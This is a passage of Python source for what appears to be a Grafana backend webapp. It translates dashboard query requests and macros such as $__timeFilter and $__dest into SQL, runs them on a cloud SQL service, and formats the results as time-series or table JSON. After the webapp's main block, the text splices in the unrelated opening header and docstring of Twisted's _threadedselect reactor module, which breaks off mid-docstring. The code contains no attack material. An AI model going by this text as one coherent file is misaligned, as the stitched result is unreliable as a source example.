Grafana sends a request which specifies that it queries for the tabular data.
The request is a JSON as
.. console-block: python
'targets': [{'target': 'series B', 'refId': 'A', 'type': 'table'}]
Grafana expects the time-series data in the format
* datapoints are a list of value and unixtimestamp in milliseconds.
.. console-block: python
[
{
"target":"series A", // The field being queried for
"datapoints":[
[622,1450754160000], // Metric value as a float , unixtimestamp in milliseconds
[365,1450754220000]
]
},
{
"target":"series B",
"datapoints":[
[861,1450754160000],
[767,1450754220000]
]
}
]
Returns
-------
[type]
[description]
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
logger.debug("========= PRINT REQUEST ============")
logger.debug(request.body.read().decode("utf-8"))
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# check to see if it's safe to launch
query = body["targets"][0]
id = query["id"]
id_name = id#"dummy_string"
name = query["name"]
key = gen_key(id_name, name)
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], query["refId"])
sql_stmt = query["queryText"]
sleep_time = max(2.0, min(15.0, 2 * len(body["targets"])))
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
sqlClient = None
key = None
for query in body["targets"]:
if "hide" in query and query["hide"] is True:
continue
res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
if res is None:
# get_result <- False
pass
else:
resp_body.append(res)
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query(fullquery, body, sqlClient=None, old_key=None):
"""
Parameters
------------
fullquery: dict
The dict object with all information required to launch a query
body: dict
The body of the original full HTTP request
sqlClient: SQLClient
The object that can launch the sql stmt string
old_key: str
The key which tracks the given sqlClient object
Returns
--------
returns a tuple (result, error_object)
None, error_object --> error is detected
result, None --> result
None, None --> when result is not needed [intermediate result]
NOTE: A result can be a dict{} : represent a single time-series data or single table data
or a list of dict: represent multiple time-series data
"""
# i = i-th query
# fullquery = body["targets"][i]
result = None
data_type = "TableData"
if "format" in fullquery and fullquery["format"] == "time_series":
data_type = "TimeSeries"
if "queryText" not in fullquery:
# don't run further
# TODO - return empty things
return {}, None
sql_stmt = fullquery["queryText"]
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# id = fullquery["id"]
id_name = fullquery["id"] #"dummy_string"
name = fullquery["name"]
key = gen_key(id_name, name)
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
from dateutil import parser
dt_from = parser.parse(body["range"]["from"])
dt_to = parser.parse(body["range"]["to"])
sdt_from = body["range"]["from"]
sdt_to = body["range"]["to"]
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
time_col, fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
if ts_form in ["ts", ""]: # single time-series"
substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
if "mts" == ts_form: # multipletime-series"
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
pass
msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
# logger.info("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
key_refId = gen_key_refId(
body["dashboardId"], body["panelId"], fullquery["refId"]
)
# for some reason Grafana sends twice, and this to prevent from running twice on Cloud SQL
# there is a chance that a new query will be sent shortly which override the current
# one - as we can't cancel a launched SQL Query --> so we put in the queue and
# wait a little before before really launch it
# if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
# break
# TODO - consider allow users to request 'rerun
rerun = False
if sqlClient:
assert old_key == key
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
if df is None:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# a unique reference needs dashboardId + panelid + refid
# TODO : When the webapp is shared by multiple instances of Grafana
# --> maybe the dashboardId and panelId can be the same for those from
# two Grafana instance --> need to resolve this
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
msg = "Query {}: unknown error {}".format(fullquery["refId"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# make NaN to empty string to so that client can understand
df.replace(np.nan, "", regex=True, inplace=True)
if data_type == "TimeSeries":
# In TypeScript:
# export type TimeSeriesValue = string | number | null;
# export type TimeSeriesPoints = TimeSeriesValue[][];
# export interface TimeSeries {
# target: string;
# datapoints: TimeSeriesPoints;
# unit?: string;
# }
# [TimeSeries] body must be a list, an element is a dict with 2 fields
# . 'target' = name of a series
# . 'datapoint' = the 2D data [row][col]
# . 'unit' = (optional)
# {'target': name, 'datapoints': datapoints})
# DataFrame
"""
https://github.com/grafana/grafana/blob/master/packages/grafana-data/src/dataframe/processDataFrame.ts
{
name: timeSeries.target || (timeSeries as any).name,
refId: timeSeries.refId,
meta: timeSeries.meta,
fields,
length: values.length, // # rows in DataFrame
};
which means we return a dict
{
'name': name,
'refId': refId,
'meta': any metadata,
'length': numeric, // # rows in DataFrame
'fields': [
{
'name': col-name, // e.g. 'Time'
'type': 'fieldtype', //see above
'config': {}, //optional
'values': [list-of-values]
},
{
'name': col-name, //e.g. 'Value'
'type': 'fieldtype', //see above
config: {
unit: "a unit-here",
},
'values': [list-of-values]
'labels': 'original a 'tag' attribute in timeSeries'
}
]
}
"""
time_col = df.columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
logger.debug("========= PRINT result of sql_stmt ============")
logger.debug(type(df))
logger.debug(".. .first 5 rows")
logger.debug(df.head(5))
logger.debug("========= END PRINT result of sql_stmt ============")
name = "series" + fullquery["refId"]
col_names = list(df.columns)
index = col_names.index(time_col)
# IMPORTANT: 2nd column must be timestamp
if index != 1:
tmp = col_names[1]
col_names[1] = time_col
col_names[index] = tmp
if len(col_names) > 2:
# process MTS (multi-time-series)
metrics_col = df.columns[2]
if "metrics_column" in fullquery:
tmp = fullquery["metrics_column"].strip()
if len(tmp) > 0:
metrics_col = tmp
index = col_names.index(metrics_col)
if index == 0:
tmp = col_names[2]
col_names[2] = metrics_col
col_names[index] = tmp
col_names = col_names[0:2]
# try returning multiple time-series
metrics = df[metrics_col].unique()
result = []
for met in metrics:
name = met
df_tmp = df[df[metrics_col].eq(met)]
datapoints = df_tmp[col_names].values.tolist()
result.append({"target": str(name), "datapoints": datapoints})
else:
# process STS (single TS)
datapoints = df[col_names].values.tolist()
# remember that an HTTP request can contain multiple queries, i.e. targets is a list
# that's why the body result should be a list
result = {"target": str(name), "datapoints": datapoints}
elif data_type == "TableData":
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
# 'text' : field-name, 'type': a string representatin of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
mdict["columns"] = []
y = build_table_schema(df)
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
@app.post("/variable")
def variable():
"""Handle the query from Grafana that read the content for a variable which can be
* list of values
* list of label/value pair
Returns
-------
[type]
[description]
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
print("========= Variable content ============")
print(request)
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
print("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
print("========= END PRINT body of REQUEST ============")
query = body["options"]["variable"]
key = None
# check to see if it's safe to launch
# query = body["targets"][0]
id_name = "dummy_string"
name = query["datasource"]
key = gen_key(id_name, name)
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
if 0:
key_refId = gen_key_refId("dummy", "dummy", query["id"])
sql_stmt = query["query"]
sleep_time = 2 # seconds
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
# NOTE: There can be multiple query variables defined; but they are sent individually to here
# if "hide" in query and query["hide"] is True:
# continue
# res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
sql_stmt = query["query"]
data_type = "TableData"
res, error_obj = process_query_variable(query, key, sqlClient)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
if res is None:
# get_result <- False
assert 0
else:
resp_body.append(res)
# must be an array
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query_variable(
fullquery,
key,
sqlClient=None,
dt_from=None,
dt_to=None,
sdt_from=None,
sdt_to=None,
):
sql_stmt = fullquery["query"]
data_type = "TableData"
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# logger.debug('------------------')
# logger.debug(grafanaPluginInstances)
# # store the object connecting to SQL Client service
# logger.debug(grafanaPluginInstancesSqlClient)
# logger.debug('------------------')
# id = fullquery["id"]
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
time_col, fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
if "aiops" == appname:
# process for AIOps data
substr += get_datetime_conditions_aiops(dt_from, dt_to) + " AND "
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
# substr += """ {time_col} >= to_date("{dt_from}") and {time_col} <= to_date("{dt_to}")""".format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
# substr += """ {time_col} BETWEEN "{dt_from}" and "{dt_to}" """.format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
# p_reg = p_cos_in
# patterns = p_reg.findall(sql_stmt)
# try:
# substr = grafanaPluginInstances.get_cos_source(key)
# except KeyError:
# # TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
# msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
# return None, HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# if len(patterns) > 0 and len(substr) == 0:
# msg = "Can't use $__source (default value has not been configured yet)"
# raise HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# for pattern in patterns:
# pattern = p_reg.search(sql_stmt)
# if pattern:
# # the $__source is used
# sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get test_data
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
if ts_form in ["ts", ""]: # single time-series"
substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
if "mts" == ts_form: # multipletime-series"
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
# key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
key_refId = gen_key_refId("dummy", "dummy", prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
pass
msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# print(sql_stmt)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
print("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
key_refId = gen_key_refId("dummy", "dummy", fullquery["id"])
# for some reason Grafana sends twice, and this to prevent from running twice on Cloud SQL
# there is a chance that a new query will be sent shortly which override the current
# one - as we can't cancel a launched SQL Query --> so we put in the queue and
# wait a little before before really launch it
# if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
# break
# TODO - consider allow users to request 'rerun
rerun = False
# FIXME - the refId can be changed - so it's not a consistent way to track
job_id = None
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
if 0:
# FIXME: 'key' and 'key_refId' are not capable of distuingishing
# queries from two panels
# TODO - it's possibel that user decide to change from 'noresult' to
# 'get-result' so we should avoid rerun if possible
# FIXME - the refId can be changed - so it's not a consistent way to track
job_id = grafanaPluginInstances.get_job_id(key, key_refId)
if job_id is None:
df, job_id = query_data(
key,
key_refId,
sql_stmt,
rerun=rerun,
sqlClient=sqlClient,
)
else:
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(
key, thread_safe=True
)
job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
if job_status == "completed":
df = sqlClient.get_result(job_id)
if df is None:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# a unique reference needs dashboardId + panelid + refid
# TODO : When the webapp is shared by multiple instances of Grafana
# --> maybe the dashboardId and panelId can be the same for those from
# two Grafana instance --> need to resolve this
assert job_id is not None
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
# job_id = sqlClient.submit_sql(sql_stmt, blocking=True)
# ok = False
# while not ok:
# gevent.sleep(20)
# ok = sqlClient.check_job_completion(job_id)
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
import traceback
traceback.print_exc()
msg = "Query {}: unknown error {}".format(fullquery["id"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(fullquery["id"])
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# make NaN to empty string to so that client can understand
df.replace(np.nan, "", regex=True, inplace=True)
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
# 'text' : field-name, 'type': a string representatin of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
# mdict["columns"] = [
# {"text":"user_agent","type":"string"},
# {"text":"Time","type":"time"},
# {"text":"value","type":"number"}
# ]
# TableData
mdict["columns"] = []
y = build_table_schema(df)
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
print(type(result))
print(result)
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
if __name__ == "__main__":
# run(app=app, host='localhost', port=18081,debug=True)
# run(app=app, host='localhost', port=18081, server='gevent')
if cmd_args.ssl is False:
run(app=app, host="0.0.0.0", port=18081, server="gevent")
else:
run(
app=app,
host="0.0.0.0",
port=18081,
server="gevent",
certfile="cert.pem",
keyfile="key.pem",
)
# run(app=app, host='0.0.0.0', port=18081, server='sslwebserver') # asynchronous I/O
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref', reloader=True) # single-threaded
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref') # single-threaded
|
_threadedselect.py | # -*- test-case-name: twisted.test.test_internet -*-
# $Id: default.py,v 1.90 2004/01/06 22:35:22 warner Exp $
#
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from __future__ import generators
"""Threaded select reactor
API Stability: unstable
Maintainer: U{Bob Ippolito<mailto:bob@redivi.com>}
The threadedselectreactor is a specialized reactor for integrating with
arbitrary foreign event loop, such as those you find in GUI toolkits.
There are three things you'll need to do to use this reactor.
Install the reactor at the beginning of your program, before importing
the rest of Twisted::
| from twisted.internet import _threadedselect
| _threadedselect.install()
Interleave this reactor with your foreign event loop, at some point after
your event loop is initialized::
| from twisted.internet import reactor
| reactor.interleave(foreignEventLoopWakerFunction)
| self.addSystemEventTrigger('after', 'shutdown', foreignEventLoopStop)
Instead of shutting down the foreign event loop directly, shut down the
reactor::
| from twisted.internet import reactor
| reactor.stop()
